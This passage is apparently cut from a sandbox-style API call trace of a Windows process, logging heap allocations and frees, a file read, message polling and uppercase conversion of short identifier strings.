(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e3020 [0210.392] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.392] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x3cf9, lpOverlapped=0x0) returned 1 [0210.393] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3cf9) returned 0x2a9a940 [0210.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e3020 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3cf9) returned 0x2a9e648 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3cf9) returned 0x2a9a940 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0210.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.398] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0210.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3cf9) returned 0x2a9a940 [0210.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0210.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3cf9) returned 0x2aa2350 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0210.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.400] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0210.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.404] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.405] RtlAllocateHeap (HeapHandle=0x2af0000, 